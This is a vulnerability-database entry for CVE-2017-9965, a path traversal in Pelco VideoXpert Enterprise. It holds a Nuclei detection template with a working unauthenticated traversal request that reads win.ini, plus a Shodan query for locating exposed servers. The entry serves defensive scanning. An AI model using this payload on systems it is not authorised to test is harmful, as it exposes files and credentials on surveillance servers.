Schneider Electric Pelco VideoXpert Enterprise 2.0 - Path Traversal

🗓️ 22 Jun 2026 05:20:07Reported by ProjectDiscoveryType

Path traversal in Pelco VideoXpert Enterprise 2.0 and earlier allows unauthenticated access to web server files.

Reporter	Title	Published	Views	Family All 11
Circl	CVE-2017-9965	5 Oct 202510:02	–	circl
CNVD	Schneider Electric Pelco VideoXpert Enterprise Directory Traversal Vulnerability (CNVD-2017-38304)	28 Dec 201700:00	–	cnvd
CVE	CVE-2017-9965	2 Jan 201803:00	–	cve
Cvelist	CVE-2017-9965	2 Jan 201803:00	–	cvelist
EUVD	EUVD-2017-18874	7 Oct 202500:30	–	euvd
ICS	Schneider Electric Pelco VideoXpert Enterprise	21 Dec 201700:00	–	ics
NVD	CVE-2017-9965	2 Jan 201803:29	–	nvd
OpenVAS	Pelco VideoXpert Multiple Vulnerabilities	11 Jul 201700:00	–	openvas
OSV	CVE-2017-9965	2 Jan 201803:29	–	osv
Prion	Directory traversal	2 Jan 201803:29	–	prion

Source	Link
packetstormsecurity	www.packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html
zeroscience	www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
ics-cert	www.ics-cert.us-cert.gov/advisories/ICSA-17-355-02
schneider-electric	www.schneider-electric.com/en/download/document/SEVD-2017-339-01/

id: CVE-2017-9965

info:
  name: Schneider Electric Pelco VideoXpert Enterprise 2.0 - Path Traversal
  author: 0x_akoko
  severity: medium
  description: |
    Schneider Electric Pelco VideoXpert Enterprise versions 2.0 and prior contain a directory traversal caused by insufficient input validation, letting unauthorized persons view web server files, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can view web server files and directories, potentially exposing sensitive configuration files, credentials, and system information.
  remediation: |
    Apply security updates provided by Schneider Electric or upgrade to a non-vulnerable version.
  reference:
    - https://packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
    - https://ics-cert.us-cert.gov/advisories/ICSA-17-355-02
    - https://www.schneider-electric.com/en/download/document/SEVD-2017-339-01/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
    cvss-score: 5.8
    cve-id: CVE-2017-9965
    cwe-id: CWE-22
    epss-score: 0.0465
    epss-percentile: 0.90551
    cpe: cpe:2.3:a:schneider-electric:pelco_videoxpert:*:*:*:*:enterprise:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: schneider-electric
    product: pelco_videoxpert
    shodan-query: title:"VideoXpert"
  tags: cve,cve2017,schneider,pelco,packetstorm,lfi,videoxpert,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'bit app support'
          - 'fonts'
          - 'extensions'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207d8a8a77a509f35b318e38734fc27066c9b932c34bd7655716fff9e71ba7742e022100fc01a267b646637e9a4dff6a2d696c9da50924f6bf081fe141961d9afb3e45c0:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

6.5Medium risk

Vulners AI Score6.5

CVSS 25

CVSS 35.8

EPSS0.0465